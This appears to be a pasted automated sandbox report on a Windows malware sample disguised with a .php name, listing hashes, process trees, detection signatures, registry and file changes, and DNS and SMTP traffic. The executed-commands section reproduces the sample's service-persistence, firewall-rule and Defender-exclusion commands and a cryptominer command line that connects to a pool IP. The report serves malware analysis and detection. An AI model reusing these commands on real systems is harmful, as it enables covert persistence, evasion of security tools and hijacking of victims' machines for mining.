· 6 years ago · Jul 24, 2019, 02:00 AM
1
2* MalFamily: ""
3
4* MalScore: 10.0
5
6* File Name: "Exes_7ca883d97b4f485451d4d57b93a2d3de.php"
7* File Size: 279552
8* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
9* SHA256: "1892a57c152a181b8f83ac44c9948252296b85e95d3c7995c08f47ad79b0f161"
10* MD5: "7ca883d97b4f485451d4d57b93a2d3de"
11* SHA1: "3d068c67b04dfb1e21d9e1279ef9d6f4fd60ff77"
12* SHA512: "441b5a4c61494f0f2b9baed484f3d76d9375b63347e4e2959850861c9e5ce417674e99a79a7109ed35b432e4aa45bb9e94ab19c5094637756ab77762c2220ac9"
13* CRC32: "2742E850"
14* SSDEEP: "3072:7rzKWRrM6wDpaa4XSrjaZADutwAKl+atzMWwQ5Ub+6bNhPNsUm7hQu+B8VEn+pBm:7yFDIGNlnWGub1lsAu+JnCUs4xcREPA"
15
16* Process Execution:
17 "Exes_7ca883d97b4f485451d4d57b93a2d3de.php",
18 "cmd.exe",
19 "cmd.exe",
20 "sc.exe",
21 "sc.exe",
22 "sc.exe",
23 "netsh.exe",
24 "services.exe",
25 "fogfoaev.exe",
26 "svchost.exe",
27 "svchost.exe",
28 "taskhost.exe",
29 "sc.exe",
30 "svchost.exe",
31 "WerFault.exe",
32 "wermgr.exe",
33 "svchost.exe"
34
35
36* Executed Commands:
37 "\"C:\\Windows\\System32\\cmd.exe\" /C mkdir C:\\Windows\\SysWOW64\\wpiyoeyo\\",
38 "cmd /C mkdir C:\\Windows\\SysWOW64\\wpiyoeyo\\",
39 "\"C:\\Windows\\System32\\cmd.exe\" /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe\" C:\\Windows\\SysWOW64\\wpiyoeyo\\",
40 "cmd /C move /Y \"C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe\" C:\\Windows\\SysWOW64\\wpiyoeyo\\",
41 "\"C:\\Windows\\System32\\sc.exe\" create wpiyoeyo binPath= \"C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\\\"\" type= own start= auto DisplayName= \"wifi support\"",
42 "sc create wpiyoeyo binPath= \"C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\\\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\\\"\" type= own start= auto DisplayName= \"wifi support\"",
43 "\"C:\\Windows\\System32\\sc.exe\" description wpiyoeyo \"wifi internet conection\"",
44 "sc description wpiyoeyo \"wifi internet conection\"",
45 "\"C:\\Windows\\System32\\sc.exe\" start wpiyoeyo",
46 "sc start wpiyoeyo",
47 "\"C:\\Windows\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
48 "netsh advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"C:\\Windows\\SysWOW64\\svchost.exe\" enable=yes>nul",
49 "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\"",
50 "taskhost.exe $(Arg0)",
51 "C:\\Windows\\system32\\sc.exe start w32time task_started",
52 "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
53 "C:\\Windows\\system32\\svchost.exe -k LocalService",
54 "svchost.exe",
55 "svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe",
56 "C:\\Windows\\system32\\WerFault.exe -u -p 2060 -s 288",
57 "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\""
58
59
60* Signatures Detected:
61
62 "Description": "At least one process apparently crashed during execution",
63 "Details":
64
65
66 "Description": "Creates RWX memory",
67 "Details":
68
69
70 "Description": "A process attempted to delay the analysis task.",
71 "Details":
72
73 "Process": "svchost.exe tried to sleep 1830 seconds, actually delayed analysis time by 0 seconds"
74
75
76
77
78 "Description": "Attempts to connect to a dead IP:Port (97 unique times)",
79 "Details":
80
81 "IP": "71.6.142.100:25"
82
83
84 "IP": "66.218.85.52:25"
85
86
87 "IP": "207.211.30.181:25"
88
89
90 "IP": "36.110.185.79:25"
91
92
93 "IP": "85.25.119.25:419"
94
95
96 "IP": "104.47.38.33:25"
97
98
99 "IP": "192.102.218.8:25"
100
101
102 "IP": "94.136.40.150:25"
103
104
105 "IP": "150.160.254.109:25"
106
107
108 "IP": "172.217.6.68:80"
109
110
111 "IP": "144.76.199.2:419"
112
113
114 "IP": "216.129.105.38:25"
115
116
117 "IP": "93.158.134.89:25"
118
119
120 "IP": "104.47.4.33:25"
121
122
123 "IP": "104.47.41.36:25"
124
125
126 "IP": "66.218.85.151:25"
127
128
129 "IP": "207.69.189.231:25"
130
131
132 "IP": "161.225.202.27:25"
133
134
135 "IP": "67.195.228.94:25"
136
137
138 "IP": "104.44.194.232:25"
139
140
141 "IP": "104.16.119.50:443"
142
143
144 "IP": "144.76.108.92:483"
145
146
147 "IP": "67.195.228.109:25"
148
149
150 "IP": "67.231.152.47:25"
151
152
153 "IP": "94.100.180.104:25"
154
155
156 "IP": "212.23.88.242:25"
157
158
159 "IP": "94.100.180.31:25"
160
161
162 "IP": "74.125.129.27:25"
163
164
165 "IP": "68.232.149.160:25"
166
167
168 "IP": "148.163.156.1:25"
169
170
171 "IP": "205.137.77.32:25"
172
173
174 "IP": "148.163.158.123:25"
175
176
177 "IP": "67.231.144.73:25"
178
179
180 "IP": "202.4.96.26:25"
181
182
183 "IP": "67.231.156.236:25"
184
185
186 "IP": "66.218.85.139:25"
187
188
189 "IP": "159.153.191.239:443"
190
191
192 "IP": "67.195.228.111:25"
193
194
195 "IP": "13.77.161.179:80"
196
197
198 "IP": "98.137.159.25:25"
199
200
201 "IP": "64.233.177.27:25"
202
203
204 "IP": "67.195.228.110:25"
205
206
207 "IP": "98.136.101.116:25"
208
209
210 "IP": "212.54.58.11:25"
211
212
213 "IP": "104.47.10.33:25"
214
215
216 "IP": "77.88.21.89:25"
217
218
219 "IP": "104.47.36.33:25"
220
221
222 "IP": "74.125.195.27:25"
223
224
225 "IP": "74.125.142.26:25"
226
227
228 "IP": "185.16.41.185:8087"
229
230
231 "IP": "176.111.49.43:419"
232
233
234 "IP": "98.137.159.27:25"
235
236
237 "IP": "104.47.41.33:25"
238
239
240 "IP": "46.4.52.109:419"
241
242
243 "IP": "91.207.212.87:25"
244
245
246 "IP": "104.47.125.33:25"
247
248
249 "IP": "167.127.246.35:25"
250
251
252 "IP": "98.137.157.43:25"
253
254
255 "IP": "74.125.129.26:25"
256
257
258 "IP": "211.231.108.47:25"
259
260
261 "IP": "65.54.188.72:25"
262
263
264 "IP": "18.209.118.139:25"
265
266
267 "IP": "68.178.213.203:25"
268
269
270 "IP": "206.152.134.65:25"
271
272
273 "IP": "172.217.6.68:443"
274
275
276 "IP": "125.209.238.100:25"
277
278
279 "IP": "67.195.228.106:25"
280
281
282 "IP": "98.137.159.24:25"
283
284
285 "IP": "208.89.132.27:25"
286
287
288 "IP": "65.54.188.110:25"
289
290
291 "IP": "213.120.69.2:25"
292
293
294 "IP": "195.231.225.144:25"
295
296
297 "IP": "177.153.23.241:25"
298
299
300 "IP": "45.56.121.201:25"
301
302
303 "IP": "148.163.149.93:25"
304
305
306 "IP": "80.67.18.126:25"
307
308
309 "IP": "209.85.144.26:25"
310
311
312 "IP": "67.231.148.237:25"
313
314
315 "IP": "23.198.7.66:443"
316
317
318 "IP": "104.47.53.36:25"
319
320
321 "IP": "104.47.32.36:25"
322
323
324 "IP": "89.175.32.82:25"
325
326
327 "IP": "104.47.2.33:25"
328
329
330 "IP": "43.231.4.7:443"
331
332
333 "IP": "98.137.159.28:25"
334
335
336 "IP": "104.47.4.36:25"
337
338
339 "IP": "65.55.37.120:25"
340
341
342 "IP": "104.16.120.50:443"
343
344
345 "IP": "94.130.209.113:80"
346
347
348 "IP": "96.114.157.80:25"
349
350
351 "IP": "167.206.4.79:25"
352
353
354 "IP": "37.1.206.139:80"
355
356
357 "IP": "74.125.141.26:25"
358
359
360 "IP": "69.31.136.5:443"
361
362
363 "IP": "195.146.81.131:25"
364
365
366 "IP": "149.255.58.37:25"
367
368
369 "IP": "144.76.199.43:419"
370
371
372
373
374 "Description": "Network anomalies occured during the analysis.",
375 "Details":
376
377 "Anomaly": "'185.16.41.185' getaddrinfo with no actual connection to the IP."
378
379
380
381
382 "Description": "Starts servers listening on 0.0.0.0:7425",
383 "Details":
384
385
386 "Description": "Reads data out of its own binary image",
387 "Details":
388
389 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x00000000, length: 0x00000040"
390
391
392 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x00000000, length: 0x00044400"
393
394
395 "self_read": "process: Exes_7ca883d97b4f485451d4d57b93a2d3de.php, pid: 2004, offset: 0x000000f0, length: 0x000001c0"
396
397
398
399
400 "Description": "A process created a hidden window",
401 "Details":
402
403 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> cmd"
404
405
406 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> cmd"
407
408
409 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
410
411
412 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
413
414
415 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> sc"
416
417
418 "Process": "Exes_7ca883d97b4f485451d4d57b93a2d3de.php -> netsh"
419
420
421 "Process": "svchost.exe -> svchost.exe -a cryptonight-heavy -o stratum+tcp://185.16.41.185:8087 -u w1 -p x --nicehash --safe"
422
423
424
425
426 "Description": "Drops a binary and executes it",
427 "Details":
428
429 "binary": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe"
430
431
432
433
434 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
435 "Details":
436
437 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
438
439
440 "http_version_old": "HTTP traffic uses version 1.0"
441
442
443 "suspicious_request": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register"
444
445
446 "suspicious_request": "http://work.a-poster.info/http://work.a-poster.info:25000/"
447
448
449
450
451 "Description": "Performs some HTTP requests",
452 "Details":
453
454 "url": "http://www.google.com/"
455
456
457 "url": "http://nolive.ir/http://nolive.ir/wp-login.php?action=register"
458
459
460 "url": "http://work.a-poster.info/http://work.a-poster.info:25000/"
461
462
463
464
465 "Description": "Enumerates services, possibly for anti-virtualization",
466 "Details":
467
468
469 "Description": "Executed a process and injected code into it, probably while unpacking",
470 "Details":
471
472 "Injection": "fogfoaev.exe(2124) -> svchost.exe(2052)"
473
474
475
476
477 "Description": "Deletes its original binary from disk",
478 "Details":
479
480
481 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
482 "Details":
483
484 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 11012645 times"
485
486
487
488
489 "Description": "Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config",
490 "Details":
491
492 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config3"
493
494
495 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config2"
496
497
498 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1"
499
500
501 "regkeyval": "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config0"
502
503
504
505
506 "Description": "Installs itself for autorun at Windows startup",
507 "Details":
508
509 "service name": "wpiyoeyo"
510
511
512 "service path": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe /d\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php\""
513
514
515 "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wpiyoeyo\\ImagePath"
516
517
518 "data": "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe"
519
520
521
522
523 "Description": "Checks the system manufacturer, likely for anti-virtualization",
524 "Details":
525
526
527 "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
528 "Details":
529
530 "file": "C:\\Windows\\System32\\config\\systemprofile:.repos"
531
532
533 "file": "C:\\Windows\\System32\\config\\systemprofile\\Local Settings:.repos"
534
535
536
537
538
539* Started Service:
540 "wpiyoeyo",
541 "WerSvc",
542 "W32Time"
543
544
545* Mutexes:
546 "Local\\ZoneAttributeCacheCounterMutex",
547 "Local\\ZonesCacheCounterMutex",
548 "Local\\ZonesLockedCacheCounterMutex",
549 "Local\\WERReportingForProcess2060",
550 "Global\\\\xe5\\x88\\x90\\xc2\\xa3",
551 "Global\\\\xed\\x95\\xb0\\xc7\\x98",
552 "WERUI_BEX64-eb71ef964c95de5826f5dbf6417783430b96dd1"
553
554
555* Modified Files:
556 "\\??\\pipe\\ngzpfvpf",
557 "C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe",
558 "C:\\Windows\\SysWOW64\\wpiyoeyo\\fogfoaev.exe",
559 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
560 "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
561 "C:\\Windows\\sysnative\\LogFiles\\Scm\\4e6828f4-11de-47bf-b7df-2249f4bdea4e",
562 "\\Device\\Http\\Communication",
563 "C:\\Windows\\System32\\config\\systemprofile:.repos",
564 "\\??\\PIPE\\lsarpc",
565 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp.appcompat.txt",
566 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp.WERInternalMetadata.xml",
567 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp.hdmp",
568 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp.mdmp",
569 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WERAE58.tmp.appcompat.txt",
570 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER36F2.tmp.WERInternalMetadata.xml",
571 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER3722.tmp.hdmp",
572 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\WER40E7.tmp.mdmp",
573 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer",
574 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer.tmp"
575
576
577* Deleted Files:
578 "C:\\Users\\user\\AppData\\Local\\Temp\\fogfoaev.exe",
579 "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_7ca883d97b4f485451d4d57b93a2d3de.php",
580 "C:\\log_plg_proxy.txt",
581 "C:\\Windows\\Temp\\log_plg_proxy.txt",
582 "C:\\log_plg_text.txt",
583 "C:\\Windows\\Temp\\log_plg_text.txt",
584 "C:\\log_plg_smtp.txt",
585 "C:\\Windows\\Temp\\log_plg_smtp.txt",
586 "C:\\log_plg_blist.txt",
587 "C:\\Windows\\Temp\\log_plg_blist.txt",
588 "C:\\log_plg_miner.txt",
589 "C:\\Windows\\Temp\\log_plg_miner.txt",
590 "C:\\log_plg_sys.txt",
591 "C:\\Windows\\Temp\\log_plg_sys.txt",
592 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp",
593 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAE58.tmp.appcompat.txt",
594 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp",
595 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER36F2.tmp.WERInternalMetadata.xml",
596 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp",
597 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER3722.tmp.hdmp",
598 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp",
599 "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER40E7.tmp.mdmp",
600 "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_eb71ef964c95de5826f5dbf6417783430b96dd1_cab_087f158e\\Report.wer.tmp"
601
602
603* Modified Registry Keys:
604 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
605 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
606 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
607 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
608 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
609 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
610 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
611 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
612 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
613 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-1",
614 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-2",
615 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-4",
616 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\napipsec.dll,-3",
617 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
618 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
619 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
620 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
621 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
622 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
623 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
624 "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
625 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wpiyoeyo\\ImagePath",
626 "HKEY_CURRENT_USER\\Control Panel\\Buses",
627 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config0",
628 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1",
629 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config2",
630 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config3",
631 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Windows\\SysWOW64\\wpiyoeyo",
632 "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
633 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
634 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
635
636
637* Deleted Registry Keys:
638 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
639 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
640 "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
641 "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
642 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config1",
643 "HKEY_USERS\\.DEFAULT\\Control Panel\\Buses\\Config4"
644
645
646* DNS Communications:
647
648 "type": "A",
649 "request": "microsoft.com",
650 "answers":
651
652 "data": "104.215.148.63",
653 "type": "A"
654
655
656 "data": "40.113.200.201",
657 "type": "A"
658
659
660 "data": "13.77.161.179",
661 "type": "A"
662
663
664 "data": "40.112.72.205",
665 "type": "A"
666
667
668 "data": "40.76.4.15",
669 "type": "A"
670
671
672
673
674 "type": "MX",
675 "request": "microsoft.com",
676 "answers":
677
678 "data": "microsoft-com.mail.protection.outlook.com",
679 "type": "MX"
680
681
682
683
684 "type": "A",
685 "request": "microsoft-com.mail.protection.outlook.com",
686 "answers":
687
688 "data": "104.47.53.36",
689 "type": "A"
690
691
692
693
694 "type": "MX",
695 "request": "yahoo.com",
696 "answers":
697
698 "data": "mta5.am0.yahoodns.net",
699 "type": "MX"
700
701
702 "data": "mta7.am0.yahoodns.net",
703 "type": "MX"
704
705
706 "data": "mta6.am0.yahoodns.net",
707 "type": "MX"
708
709
710
711
712 "type": "A",
713 "request": "mta6.am0.yahoodns.net",
714 "answers":
715
716 "data": "74.6.137.64",
717 "type": "A"
718
719
720 "data": "67.195.228.106",
721 "type": "A"
722
723
724 "data": "67.195.228.109",
725 "type": "A"
726
727
728 "data": "98.137.159.27",
729 "type": "A"
730
731
732 "data": "98.137.159.26",
733 "type": "A"
734
735
736 "data": "74.6.137.63",
737 "type": "A"
738
739
740 "data": "66.218.85.52",
741 "type": "A"
742
743
744 "data": "67.195.228.110",
745 "type": "A"
746
747
748 "data": "67.195.228.94",
749 "type": "A"
750
751
752 "data": "67.195.228.111",
753 "type": "A"
754
755
756 "data": "66.218.85.139",
757 "type": "A"
758
759
760 "data": "98.137.159.25",
761 "type": "A"
762
763
764 "data": "98.137.159.24",
765 "type": "A"
766
767
768 "data": "98.137.159.28",
769 "type": "A"
770
771
772 "data": "74.6.137.65",
773 "type": "A"
774
775
776
777
778 "type": "A",
779 "request": "222.87.245.185.dnsbl.sorbs.net",
780 "answers":
781
782 "data": "",
783 "type": "NXDOMAIN"
784
785
786
787
788 "type": "A",
789 "request": "222.87.245.185.bl.spamcop.net",
790 "answers":
791
792 "data": "",
793 "type": "NXDOMAIN"
794
795
796
797
798 "type": "A",
799 "request": "222.87.245.185.zen.spamhaus.org",
800 "answers":
801
802 "data": "",
803 "type": "NXDOMAIN"
804
805
806
807
808 "type": "A",
809 "request": "222.87.245.185.sbl-xbl.spamhaus.org",
810 "answers":
811
812 "data": "",
813 "type": "NXDOMAIN"
814
815
816
817
818 "type": "A",
819 "request": "222.87.245.185.cbl.abuseat.org",
820 "answers":
821
822 "data": "",
823 "type": "NXDOMAIN"
824
825
826
827
828 "type": "MX",
829 "request": "vas.com",
830 "answers":
831
832 "data": "inbound-smtp.us-west-2.amazon.com",
833 "type": "MX"
834
835
836 "data": "vas-com.mail.protection.outlook.com",
837 "type": "MX"
838
839
840
841
842 "type": "A",
843 "request": "mx1.hotmail.com",
844 "answers":
845
846 "data": "65.55.92.168",
847 "type": "A"
848
849
850 "data": "104.44.194.237",
851 "type": "A"
852
853
854 "data": "65.54.188.72",
855 "type": "A"
856
857
858 "data": "65.55.37.72",
859 "type": "A"
860
861
862 "data": "65.55.37.88",
863 "type": "A"
864
865
866 "data": "104.44.194.231",
867 "type": "A"
868
869
870 "data": "104.44.194.234",
871 "type": "A"
872
873
874 "data": "104.44.194.236",
875 "type": "A"
876
877
878 "data": "104.44.194.233",
879 "type": "A"
880
881
882 "data": "104.44.194.232",
883 "type": "A"
884
885
886 "data": "65.55.33.135",
887 "type": "A"
888
889
890 "data": "65.55.92.184",
891 "type": "A"
892
893
894 "data": "65.55.37.104",
895 "type": "A"
896
897
898 "data": "104.44.194.235",
899 "type": "A"
900
901
902 "data": "65.55.92.136",
903 "type": "A"
904
905
906
907
908 "type": "A",
909 "request": "vas-com.mail.protection.outlook.com",
910 "answers":
911
912 "data": "104.47.33.36",
913 "type": "A"
914
915
916 "data": "104.47.32.36",
917 "type": "A"
918
919
920
921
922 "type": "MX",
923 "request": "hillyard.com",
924 "answers":
925
926 "data": "us-smtp-inbound-1.mimecast.com",
927 "type": "MX"
928
929
930 "data": "us-smtp-inbound-2.mimecast.com",
931 "type": "MX"
932
933
934
935
936 "type": "A",
937 "request": "mta7.am0.yahoodns.net",
938 "answers":
939
940 "data": "67.195.228.94",
941 "type": "A"
942
943
944 "data": "74.6.137.64",
945 "type": "A"
946
947
948 "data": "66.218.85.52",
949 "type": "A"
950
951
952 "data": "67.195.228.106",
953 "type": "A"
954
955
956 "data": "98.137.159.25",
957 "type": "A"
958
959
960 "data": "98.137.159.24",
961 "type": "A"
962
963
964 "data": "67.195.228.111",
965 "type": "A"
966
967
968 "data": "67.195.228.110",
969 "type": "A"
970
971
972 "data": "74.6.137.63",
973 "type": "A"
974
975
976 "data": "98.137.159.26",
977 "type": "A"
978
979
980 "data": "98.137.159.28",
981 "type": "A"
982
983
984 "data": "67.195.228.109",
985 "type": "A"
986
987
988 "data": "98.137.159.27",
989 "type": "A"
990
991
992 "data": "74.6.137.65",
993 "type": "A"
994
995
996 "data": "66.218.85.139",
997 "type": "A"
998
999
1000
1001
1002 "type": "A",
1003 "request": "us-smtp-inbound-1.mimecast.com",
1004 "answers":
1005
1006 "data": "207.211.30.102",
1007 "type": "A"
1008
1009
1010 "data": "205.139.110.141",
1011 "type": "A"
1012
1013
1014 "data": "205.139.110.221",
1015 "type": "A"
1016
1017
1018 "data": "205.139.110.181",
1019 "type": "A"
1020
1021
1022 "data": "207.211.30.237",
1023 "type": "A"
1024
1025
1026 "data": "205.139.110.242",
1027 "type": "A"
1028
1029
1030 "data": "205.139.110.102",
1031 "type": "A"
1032
1033
1034 "data": "207.211.30.107",
1035 "type": "A"
1036
1037
1038 "data": "207.211.30.181",
1039 "type": "A"
1040
1041
1042 "data": "205.139.110.107",
1043 "type": "A"
1044
1045
1046 "data": "207.211.30.221",
1047 "type": "A"
1048
1049
1050 "data": "205.139.110.145",
1051 "type": "A"
1052
1053
1054 "data": "207.211.30.145",
1055 "type": "A"
1056
1057
1058 "data": "207.211.30.242",
1059 "type": "A"
1060
1061
1062 "data": "207.211.30.141",
1063 "type": "A"
1064
1065
1066 "data": "205.139.110.177",
1067 "type": "A"
1068
1069
1070
1071
1072 "type": "MX",
1073 "request": "randomwag.com",
1074 "answers":
1075
1076 "data": "",
1077 "type": "NXDOMAIN"
1078
1079
1080
1081
1082 "type": "MX",
1083 "request": "bardakov.ru",
1084 "answers":
1085
1086 "data": "aspmx2.googlemail.com",
1087 "type": "MX"
1088
1089
1090 "data": "alt2.aspmx.l.google.com",
1091 "type": "MX"
1092
1093
1094 "data": "alt1.aspmx.l.google.com",
1095 "type": "MX"
1096
1097
1098 "data": "aspmx3.googlemail.com",
1099 "type": "MX"
1100
1101
1102 "data": "aspmx.l.google.com",
1103 "type": "MX"
1104
1105
1106
1107
1108 "type": "MX",
1109 "request": "address.com",
1110 "answers":
1111
1112 "data": "mail05.mailtwo.com",
1113 "type": "MX"
1114
1115
1116 "data": "mail04.mailtwo.com",
1117 "type": "MX"
1118
1119
